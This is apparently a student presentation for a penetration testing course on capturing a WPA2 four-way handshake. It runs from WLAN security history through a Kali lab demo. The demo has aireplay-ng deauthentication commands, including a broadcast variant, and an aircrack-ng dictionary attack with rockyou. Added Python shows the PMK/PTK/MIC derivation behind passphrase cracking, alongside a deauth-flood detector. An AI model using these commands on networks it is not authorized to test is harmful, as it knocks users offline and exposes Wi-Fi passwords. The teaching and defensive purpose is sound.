Wireless Network Penetration Testing
Capturing a WPA2 Four-Way Handshake
Tina Ellis
CSIA 440 Cyber Test & Penetration
May 10, 2023
Background
Wireless penetration tests, commonly known as wireless pentests, typically assess three main aspects of a wireless network:
• Range
• Data Security
• Unauthorized Access
The Evolution of WLAN Security: Wired Equivalent Privacy (WEP)
• 802.11 – First Wireless Local Area Network (WLAN) standard
• Open System Authentication (OSA)
• Shared Key Authentication (SKA)
• Pre-Shared Key (PSK) 64 – 128 bits
• PSK sent in plain text
• WEP protocol should not be used
3.59% of networks still use WEP – WiGLE.net/stats
The Evolution of WLAN Security: Wi-Fi Protected Access (WPA)
• Established by the Wi-Fi Alliance, under 802.11i
• Pre-Shared Key (PSK) 256 bits and salted
• Temporal Key Integrity Protocol (TKIP)
• WPA Personal
• Launched hastily
• Should not be used
3.48% of networks still use WPA – WiGLE.net/stats
The Evolution of WLAN Security: Wi-Fi Protected Access 2 (WPA2)
• Second WLAN standard established by the Wi-Fi Alliance, under 802.11i
• Significant advancement in security over WPA
• Advanced Encryption Standard (AES) 128 bits
• Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCM Protocol or CCMP)
• Management Frame Protection (MFP) for enterprise
• Susceptible to deauthentication attacks
73.09% of networks use WPA2 – WiGLE.net/stats
The Evolution of WLAN Security: Wi-Fi Protected Access 3 (WPA3)
• Third WLAN standard established by the Wi-Fi Alliance, under 802.11ax
• Diffie-Hellman Key Exchange
• Personal and Enterprise
• Personal: CCMP-128 (AES-128 in CCM mode)
• Enterprise: restricts the algorithms used (192-bit security mode: AES-256 in GCM mode with SHA-384 as HMAC)
• Not supported by older/embedded interfaces
• Downgrade/side-channel attacks
0.32% of networks use WPA3 – WiGLE.net/stats
Wireless Testing Equipment
• Laptop
• Kali Linux OS
• Wireless Adapter
  1. Atheros AR9271
  2. Ralink RT3070
  3. Ralink RT3572
• Wireless Router
• Wireless Client (to generate traffic)
Pictured: TP-Link AC1900 Archer T9UH
Cracking WPA2-PSK: Background
How the four-way handshake works
1. AP → Client (Message 1): The AP sends an ANonce to the client
2. Client → AP (Message 2): The client creates an SNonce and some hashes, and sends the SNonce and ANonce back to the AP
3. AP → Client (Message 3): The AP sends a confirmation with the ANonce, SNonce, and hashes back to the client
4. Client → AP (Message 4): The client sends the AP a confirmation
DEMO: Pre-Game
How de-authentication works
When a device wants to disconnect, it sends a deauthentication frame to the AP. This is a normal part of Wi-Fi operation.
Deauth Attacks
• Attacker sends fraudulent deauthentication frames to a target device
• Frames pretend to be from the AP
• Device disconnects and attempts to reconnect to the AP
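Because deauthentication frames are unauthenticated unless Management Frame Protection (802.11w) is in use, a wireless monitor can spot the attack pattern above by counting unprotected deauth/disassoc frames per sender and target over a short window, while a single legitimate disconnect stays quiet. The following Python is an added example, not code from the slides: it parses the 802.11 management header of constructed frames and raises an alert on a burst; the MAC addresses, threshold and window are assumptions.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A          # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def _mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def _mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def build_mgmt_frame(subtype, dst, src, bssid, seq, reason, protected=False) -> bytes:
    """Constructed 802.11 management frame (no radiotap header), used only as sample input:
    frame control, duration, addr1/addr2/addr3, sequence control, then a 2-byte reason code."""
    fc0 = subtype << 4                   # type bits 2-3 stay 0 (management)
    fc1 = 0x40 if protected else 0x00    # Protected Frame bit, set under 802.11w/MFP
    return (bytes([fc0, fc1]) + b"\x00\x00"
            + _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid)
            + struct.pack("<H", (seq & 0xFFF) << 4) + struct.pack("<H", reason))

def parse_disconnect(frame: bytes):
    """Return the fields of a deauth/disassoc frame, or None for anything else."""
    if len(frame) < 26 or (frame[0] >> 2) & 0x3 != 0:
        return None                      # too short, or not a management frame
    subtype = frame[0] >> 4
    if subtype not in (DEAUTH, DISASSOC):
        return None
    return {"subtype": subtype, "protected": bool(frame[1] & 0x40),
            "dst": _mac_str(frame[4:10]), "src": _mac_str(frame[10:16]),
            "bssid": _mac_str(frame[16:22]),
            "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
            "reason": struct.unpack("<H", frame[24:26])[0]}

class DeauthMonitor:
    """Sliding-window count of unprotected deauth/disassoc frames per (src, dst) pair.
    Threshold and window are assumed tuning values; one frame is normal Wi-Fi behaviour."""
    def __init__(self, threshold: int = 5, window_s: float = 10.0):
        self.threshold, self.window_s = threshold, window_s
        self.seen = defaultdict(deque)

    def observe(self, ts: float, frame: bytes):
        info = parse_disconnect(frame)
        if info is None or info["protected"]:
            return None                  # not a disconnect, or MFP-protected (a forgery without the key fails)
        q = self.seen[(info["src"], info["dst"])]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()
        if len(q) < self.threshold:
            return None
        kind = "deauth" if info["subtype"] == DEAUTH else "disassoc"
        return (f"{kind} flood: {info['src']} -> {info['dst']} "
                f"({len(q)} frames in {self.window_s:g}s, reason {info['reason']})")

def run_demo():
    """Constructed traffic: one legitimate client deauth, then a burst of five broadcast
    deauths claiming to come from the AP within half a second."""
    ap, client = "02:00:00:00:00:01", "02:00:00:00:00:02"   # assumed lab MACs
    mon = DeauthMonitor()
    alerts = [mon.observe(0.0, build_mgmt_frame(DEAUTH, ap, client, ap, 1, 3))]
    for i in range(5):
        alerts.append(mon.observe(5.0 + 0.1 * i,
                                  build_mgmt_frame(DEAUTH, BROADCAST, ap, ap, 100 + i, 7)))
    return [a for a in alerts if a]

if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

On a network where the AP and clients negotiate MFP, the `protected` check is the interesting part: forged frames arrive without the Protected Frame bit and a valid MIC, so clients ignore them and the monitor can treat any unprotected deauth as suspicious.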
DEMO: Pre-Configuration (VirtualBox, Kali)
Verify the USB Wi-Fi adapter is recognized in the system
• lsusb
Identify the name of your Wi-Fi adapter
• iwconfig
DEMO: Wireless Scanning & Discovery
Enable monitor mode on the wireless interface card
• sudo airmon-ng start wlan0
Identify the channel your target AP is operating on
• sudo airodump-ng wlan0
Note the BSSID (MAC address), Channel, and the ESSID (Network Name). Once you’ve identified the AP information, use CTRL-C to exit.
DEMO: Capture Four-Way Handshake
With monitor mode enabled on the wireless interface card, start airodump-ng
• sudo airodump-ng -c 149 --bssid <macaddress> -w handshake wlan0
As wireless clients connect to this AP, they will appear under the STATION column and will report the BSSID of the AP they are connecting to.
DEMO: Capture Four-Way Handshake
[Photo: real life picture of me waiting to passively capture a four-way handshake]
DEMO: Deauth Attack
In a separate terminal, run aireplay-ng
• sudo aireplay-ng -0 5 -a <apmacaddress> -c <clientmacaddress> wlan0
If you don't know the MAC address of a specific client, you can still send deauthentication packets to all clients connected to the AP. You do this by omitting the `-c` option from your command:
• sudo aireplay-ng -0 5 -a <apmacaddress> wlan0
DEMO: Capture Four-Way Handshake (Success!)
In your four-way handshake airodump-ng terminal, you will know when you have captured the four-way handshake when you see the "WPA handshake" message next to the target BSSID. This took several tries.
DEMO: Dictionary Attack
Using the rockyou wordlist
• aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <apmacaddress> <name of outputfile>
*Make sure you specify the .cap output file that was generated
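To show what the four-way handshake described earlier actually hands to aircrack-ng, and what the dictionary attack above checks per wordlist entry, here is an added Python walk-through of the WPA2-PSK derivation (example code, not from the slides or the aircrack-ng project): PBKDF2 of passphrase and SSID into the PMK, PRF-512 over the two MACs and two nonces into the PTK, and the HMAC-SHA1 MIC on EAPOL message 2 against which a candidate passphrase is verified. The SSID, MAC addresses, nonces and passphrase are constructed lab values.

```python
import hashlib
import hmac
import struct

# Constructed lab values (not from the slides). In a real capture the SSID comes from the
# beacon and the MACs and nonces from EAPOL messages 1 and 2 in airodump-ng's .cap file.
SSID = b"LabNet"
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = hashlib.sha256(b"constructed-anonce").digest()   # 32-byte nonce from the AP
SNONCE = hashlib.sha256(b"constructed-snonce").digest()   # 32-byte nonce from the client
MIC_OFFSET = 81   # EAPOL hdr 4 + desc 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8

def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the only step that
    involves the secret, and therefore the only per-guess cost an attacker pays."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def derive_ptk(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public values seen in messages 1 and 2 (sorted, per spec)."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): RSN descriptor, key info 0x010a
    (HMAC-SHA1 MIC, pairwise, MIC bit set), replay counter 1, SNonce, MIC, no key data."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x02\x03" + struct.pack(">H", len(body)) + body

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 16 bytes. The KCK is the first 16 bytes of the PTK."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def client_sign_msg2(passphrase: str) -> bytes:
    """What a legitimate client does: derive the PTK and put the MIC on message 2."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))

def candidate_matches(candidate: str, captured_msg2: bytes) -> bool:
    """What aircrack-ng does per wordlist entry: redo the derivation with the candidate and
    compare the recomputed MIC with the one carried in the captured message 2."""
    kck = derive_ptk(pmk_from_passphrase(candidate, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    expected = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, captured_msg2), expected)

if __name__ == "__main__":
    captured = client_sign_msg2("correct horse battery")    # the handshake airodump-ng saved
    for guess in ("password", "correct horse battery"):
        print(f"{guess!r}: {'match' if candidate_matches(guess, captured) else 'no match'}")
```

Every input to the check except the passphrase is public (it is all in the .cap file), so a WPA2-PSK network's resistance to this attack is its passphrase entropy alone, paid for at 4096 PBKDF2 rounds per guess; WPA3's password-authenticated key exchange (the WPA3 slide) is designed to remove this offline check.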
Summary
• The Evolution of WLAN Security
• Wired Equivalent Privacy (WEP)
• Wi-Fi Protected Access (WPA)
• Wi-Fi Protected Access 2 (WPA2)
• Wi-Fi Protected Access 3 (WPA3)
• Wireless Testing Equipment
• Wireless Scanning & Discovery (Aircrack)
• Capturing a WPA2 Four-Way Handshake
• Deauthentication attacks
• Dictionary attacks